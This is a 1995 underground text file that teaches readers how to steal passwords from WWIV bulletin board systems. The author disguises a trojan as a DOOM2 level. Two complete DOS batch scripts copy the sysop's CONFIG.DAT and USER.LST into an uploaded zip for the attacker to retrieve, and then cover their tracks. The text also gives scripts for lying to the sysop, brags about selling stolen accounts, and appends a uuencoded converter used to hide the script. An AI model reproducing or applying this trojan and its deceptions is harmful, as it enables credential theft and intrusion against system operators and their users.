Subject: HOW TO HACK WWIV (UPDATE)


        Hacking passwords out of WWIV software really isn't that
difficult.
All you have to do is write a *.com file to do it all for you. Here is the
way I like to do it: 

        Before we begin you should find some sort of file you want to
upload
onto the WWIV BBS. I usually use a DOOM or DOOM2 *.WAD file because
everyone
loves DOOM and there are so many files that usually noone notices a new
one.
What you'll want to do is create a *.TXT file for your *.WAD file (usually
they come with the WAD file) which describes the external level. At the
bot-
tom of the file you'll want to edit it to say that this WAD file has been 
password protected to keep from being modified, but that there is a COM
file
included that <<MUST>> be run if it is to be uploaded onto a BBS for
others
to download. Now it is time to write a batch file. You'll also want to
make
some B.S. by E-mailing the Sysop that even if they don't have DOOM2 that
this
file <<MUST>> be in a directory called DOOM2. <<Also be sure to tell the 
sysop that PKZIP.EXE must be in their DOS directory.(There is a way around
this which I will talk about later.)>>

        To write a Batch file (*.BAT) all you need is the EDIT command at
the
DOS prompt. Call the file whatever the name of the WAD is. EX: Maze.bat.
Now
you will want to type in what you want the batch file to do. Here is the
way
that I do it:

@echo off
copy c:\wwiv\config.dat c:\wwiv\maze1.txt
attrib -r c:\wwiv\maze1.txt
pkzip c:\doom2\maze.zip -a c:\wwiv\maze1.txt  
del c:\wwiv\maze1.txt
copy c:\wwiv\data\user.lst c:\wwiv\data\mazedoc.txt
attrib -r c:\wwiv\data\mazedoc.txt
pkzip c:\doom2\maze.zip -a c:\wwiv\data\mazedoc.txt
del c:\wwiv\data\mazedoc.txt
pkzip c:\doom2\maze.zip -d maze.com
del maze.com
cd\doom2
doom2 -file maze.wad

        The first line makes it so the person who's files you are going to

hack can't see the commands the BATCH file is doing. 
        The second line makes a copy of the CONFIG.DAT file in the WWIV 
directory so you can download it. This file contains the SYSTEM PASSWORD
which
is needed to gain SYSOP access to the BBS...REMEMBER: This program hacks
the
files on the person's computer on which the BBS is located to give you the
account names and passwords.
        The third line removes the READ ONLY attribute to the copy of the 
CONFIG.DAT file so you can delete it later.
        The forth line puts the new CONFIG.DAT file into the original
*.ZIP
file that you uploaded to the BBS. This is where the need for telling the 
SYSOP that when they see PKZIP running that all it is doing is removing
the
password protection on the *.zip file. If you don't tell them this, they
will
get curios as to why PKZIP was running and they may find you out.
        The fifth line deletes the copy of the CONFIG.DAT file you made.
        The sixth - ninth line are doing much of the same thing as the
second
through fifth line only this time it is retreaving the file with the USER
pas-
swords and account names.
        The tenth line removes the *.com file from the original *.zip file

you uploaded so that other BBS users cannot see what you did if they also
download the file.
        The eleventh line deletes the *.com file that is running all this.
        The twelvth through thirteenth lines just run DOOM2 with the new
WAD
file running. If the Sysop doesn't have DOOM2 that's ok and the program
will
just end after the eleventh line.
        To make this BATCH file into a COM file you are going to need a 
program called BAT2EXEC.COM. It has been included at the bottom. You don't

have to do this, but if the sysop decides to look at the BATCH file before

they run it...You're Screwed!!!

哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
哪哪
        Ok. Now that you have the *.com file written and modified to your 
specific file zip the files *.WAD, *.TXT, and *.COM file into the file
that
you specified in your COM file. Now just upload the file and E-mail the
sysop
all the crap about the file needs to be run like this and that. NOTE: Tell
the
sysop to unzip the file in their DOOM2 directory and then run the COM
file.
After they run it just put the original *.zip file on the BBS for others
to
download. If you get a chance to upload the file to a directory other than
SYSOP than check the file to see how big it is before you leave the BBS.
Reme-
mber that number and check the file everynow and again to see if it has 
increased in size. If it has, download it and use a HEX editor to read the

files that the *.com file retrieved from the WWIV system. After you get
the
file reupload the WAD file and tell the SYSOP to delete the old zipped
file 
and to replace it with this newer (yea right) version of the file. This
way,
no one else can download the file and also get all the passwords. That's
it.
Have Phun. This works almost everytime if you do it right. After I get all
the
passwords, I like selling certain account names and numbers to my
friends...
Cha-Ching!!!
        Ok. Ok. I'll tell you how to do it without having to tell the
sysop to
make sure that pkzip is in their DOS directory.
        First upload Pkzip to the BBS. Remember the name of the area you 
uploaded it to. If the name of the area is COMPRESSION then on the
person's
computer to whom the files are on the directory which contains those files
is probably called COMPRESSION or COMP. Note: Because you have to guess at
the
name of the directory, this is not a sure fire way.
        Next, find a zipped file somewhere on the BBS, preferably on that
is
in the same directory as the PKZIP.EXE file.
        Now you're going to have to write another BATCH file...(YEA). Here
is
the way I did it:

@echo off
cd\wwiv
copy config.dat trog.txt
attrib trog.txt -r
cd\wwiv\dloads\upload
pkzip trog.zip -a c:\wwiv\trog.txt
cd\wwiv
del trog.txt
cd\wwiv\data
copy user.lst trog.doc
attrib -r trog.doc
cd\wwiv\dloads\upload
pkzip trog.zip -a c:\wwiv\data\trog.doc
cd\wwiv\data
del trog.doc
cd\wwiv\dloads\upload
kewl

        I'm not going to explain this one...you can probably figure it
out.
        The way to do this tecnique is to write (or get for you
non-program-
ming literate) a stupid little program. <<<YOU DO NOT ZIP THIS PROGRAM UP.

JUST LEAVE IT AS AN EXE FILE.>>> I wrote a program called "KEWL" hence the

last line of the BATCH file. I also called the BATCH file (which I turned
into
a COM file) "KEWL.COM". I then uploaded these file onto a WWIV BBS and
gave
the SYSOP crap about how the only way to run the file "KEWL.EXE" I
uploaded,
was to use the COM file. Oh yea. One more thing. In the BATCH file above, 
TROG.ZIP is the zipped file that I chose to put the neccasary file in. One

last thing. After you download the file with the files in it...since you 
didn't originally upload it there is no "upgrade" right...WRONG...just
upload
something with the same file name (or slightly different like TROG2.ZIP)
and
tell the sysop to delete the old one. Who cares if its the real thing or
not.
哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
哪哪
M砈溽�
哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
哪哪
El Queso Es Vjo y Podrido...―onde Esta El Ba?

I can be reached at MiSeRy42@aol.com
                                     
Disclamer: M砈溽� claims absolutly NO respnsibility for getting caught...
           don't blame me for your stupidity...

Copyright 1995 C殁怄炰d P韜溻 Inc. 

The following is the file BAT2EXEC.COM...It has been UUENCODED...to
unencode 
it you will need wither wincode or uudecode...if you don't know how to
decode
this once you have the utility...you are stupid...


section 1 of uuencode 5.21 of file bat2exec.com    

begin 644 bat2exec.com
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
M3L8$`+@`/<TA<F&+V,<&AP+__[0_BQ:#`HL.A0*#Z03-(8OZ`_@[P7(N_5*+
MT(O(L`TX1?]U!$]/24GRKOR#QP.#P0.'RBO1N0``=`%)N`%"S2&)'H<"6K@:
M&JNK@SZ'`O]U!+0^S2'X7E_#^;KH`NOWK#P-=`0\&G4#^>L<@/L#=`V`^P%T
M#'?H/"!VY.L(/#UT!#P@=]I.^,.X-!+_T(N&-!+_X',#Z13T<@/I#_3I#/2-
MMC02B[8T$KXT$HV^-!*+OC02OS02````````````````````````````````
M`````````````5X``````.LZD$-O;7!I;&5D(&)Y($)!5#)%6$5#(#$N-0T*
M4$,@36%G87II;F4@_B!$;W5G;&%S($)O;&EN9PT*&OR]7`&+;@"+I@(`BYX$
M`+1*S2&A+`")AAH`BYX``/_C``````4``````+@`3,TA```.``````"*%$8*
MTG0&M`+-(>OSPP``,@``````Z!0`14-(3R!I<R`D;VX*#21O9F8*#21:4+0)
MS2&!P@D`6`K`=`>!P@4`@\(%M`G-(<,``"P``````.@?`%-T<FEK92!A;GD@
M:V5Y('=H96X@<F5A9'DN+BX-"B1:M`G-(;0'S2'#```%``````#^AA\`PP``
M(0``````K#P)=!0\.W00/"QT##P@<@YT!@K2=>GK!`K2=./XP_G#```B````
M`@`!$5/H``!;,M+_5_IR$?[.?@G^PO]7^G($Z^Q.^%O#^>O[``!A````!`"]
M$2T24^@``%M75K3_K`K`=`D\)703JO[,=?(RP*I>7[/_*MR(7?];PZQ)/"5T
MYSQ_=1)6B[8.`*P\`'0%JO[,=?9>ZP^*\(#N,'(.@/X)=PG_5_@*Y'6UZ\%.
M0?]7^NOS``!H`````@`J$5/H!@!$3U,R6`!;458>OH``,\F*#$8^`K8?``KV
M=2M0M##-(3P"6'<$C3?K(@97C@8L`#+`,_^Y`(#RKJYU^Z^+]U\'CAXL`.L%
M_U?Z<A*L/"!V#3P[=`D\+'0%JO[,=>X?7EE;PP``+@````(`8Q)3Z```6QZY
M_P!7B_Z+T;`E\JXKT4J+SU]1_U?Z<@JL"L!T!:K^S'7V7A];PP``1@``````
M4U%7!HZ&&@`S_XO>B_.+RO.F=!0RP+G___*N)H`]`'7KB_<&'_GK&8OW!A^L
M/#UU^X`\`'3KK`K`<@0\('+W3O@'7UE;PP``8P$```H`:11P$!P4LA3[%5/H
M,@``4$%42#U#3TU%6$5"050`````0F%D(&-O;6UA;F0@;W(@9FEL92!N86UE
M#0H`+T,@`%N)=P^)?Q&+E@H`@\($QD<Q`,8'`(OZ,\D*#W5S4E8STH!\`3IU
M#8H4@.+?@.I`I8-'#P*`/%QT'+!<JE:+][1'S2%>,L"Y0`#RKD^`??]<=`.P
M7*HSP*P]+BYU#OVP7+D2`/*N\J[\1^OLJHK@/%QU`_Y',3P`==Y/B]?]N04`
ML"[RKOQU`T>+UXOZ7EKK)8!_,0!U"(MW#_]7]G,(C7<3_U?TZWNY20"L/"!V
M!SPN=`.JXO2P+JJ-=P:Y`P"EI#+`JE)648OR_U?Z65Y:<PJ#[P3BZ?X'Z3O_
M@_D!=3.-=RZ#Z@.+^J6D,L"Y_`#RKL9%_R"+=Q$X3/]W`XI,__.DQ@4-B_*+
MQRO"B$3__U?RZP^+?Q%/_@U7B_+_5_A?_@5;PP``10````(`8Q)3Z`0`4$%4
M2%M25AZZ!`"+\_]7^DGC"ZP*P'0D/#MU]^ORK#P[=`<*P'0#JNOT#A\F@'W_
M7'0#L%RJ^!]>6EO#^>OX```A````!`"R%)(44^@``%N+_D^*AAX`'E#_5_HN
M_U?X6!^(AAX`6\,``!@````"`&,24^@'`$-/35-014-;N@<`B_/_5_I;PP``
M>0``````4^@@``!$54U-62`@($9#0@``````1%5-35D@("!&0T(`````6QX&
MB:8"`%=6B_=&C3^X`RG-(8U_$+@#*<TA7E\.C5<04@Z-%U(.5RZ+AAH`4(O<
MN`!+B];-(;U<`2Z+;@",R_J.TXNF`@#[_`<?M$W-(8B&'@!;PP``90````0`
M<!"Q%>@;`"`@("`@("`@($QA8F5L(&YO="!F;W5N9`T*`%M7B_LSTKD(`*P\
M('8./&%R!B3?/%IW!*I"XNV+RHOSB[X8``/]4_]7^UI><@^+1P(+]G0#B0+#
M6/]W`L.+VO]7^<,```D``````#/`"P1T`EM0PP``*```````5HO6B\&+WXO[
M@\<$B_*+R#@-=05'\Z9T#(,__W0$`Q_KY?GK`?A>PP``$@``````,\F*3/\Z
M3?]U!O.F=0+XP_G#```5``````"+U[0:S2&+UC/)M$[-(7($@\<>^,,``"$`
M`````#/`B]B*'(#K,'(1@/L)=PRZ"@#WXG(%`\-&Z^@XAAX`PP``KP````(`
M*A%3Z"X`````````````````````````````````````````````````````
M`````````%M6BW<!"_9T!8H'B$3_7HU7`[0:S2&`?0$`=`NT3\TA<@6-5R'K
M/L9%`0#^!8HU_U?Z<CN+UC+DK#P@=@X\/W4"_L0\*G7Q_L3K[3+`AD3_B`<*
MY'0/QD4!`3/)M$[-(7+%C5<>B98.`(EW`?A;P\<%``#'1P$``/GK\@``3P``
M````4P:A+``YAAH`=4$.!R:A%@"+T%!(CL`F@#X``$T'=2PF.Q86`'7FN1X`
MCL`F`P8#`$".P":`/@``3740)CL6`0!T!.+GZP5`B88:``=;PP``;0$```8`
M^!9P$&,24^@H````3W5T(&]F(&5N=FER;VYM96YT('-P86-E#0H`#0H`3F\@
M4&%T:`!;B\>&Q(@G4/]7]EA5!H#\`W4AN@0`_U?Z<P>-=R`.'^L#@^X%+O]7
M^`X?C7<=_U?XZ0,!N?\`,])6B_ZL"N1T'#P@=1BP/5>JK#P@=/L\/73WJ@K`
M=`.LZ_A?ZQT*P'09/#UT%3QA<@8\>G<")-\\('8"_L:J_L+BPEZ(5P&*QC+V
M"O9U``K`=28>+HZ>&@`S]HU_'8S)+O]7^!Y6CMF+]R[_5_A>'X`\`'7K'^F'
M`(O&1RZ`/2!S`C/`4/]7^EH>!XO^<B$RP/VY``'RKD='5_RY``'RKHOW7S+D
MK*H*X'0$BN#K]D\.'XOR"_9T2`:,P$B.P":++@,`L033Y4U-!S/`BD<!_L`#
MQSO%<QZ*)SO]<QBL@/P"=0H\87(&/'IW`B3?J@K`=>>JZPLRP*H.!XUW`O]7
M^`==6\,``$$``````,>&$`#__XO6,\FX`CP+_W0"_L3-(7(IB]@+_W0+N`)"
M,]*+RLTA<AB)GA(`4[1%NP$`S2&)AA``N0$`6[1&S2'#```;``````"#OA``
M_W03M$:+GA``N0$`S2&T/HN>$@#-(<,``"8``````,>&%`#__XO6N``]S2%R
M%HF&%@!0M$4SV\TAB884`#/)6[1&S2'#```:``````"#OA0`_W02M$8SR8N>
=%`#-(;0^BYX6`,TAPP``!P``````B]:T0<TAPY`A
`
end
sum -r/size 21969/8689 section (from "begin" to "end")
sum -r/size 64468/6284 entire input file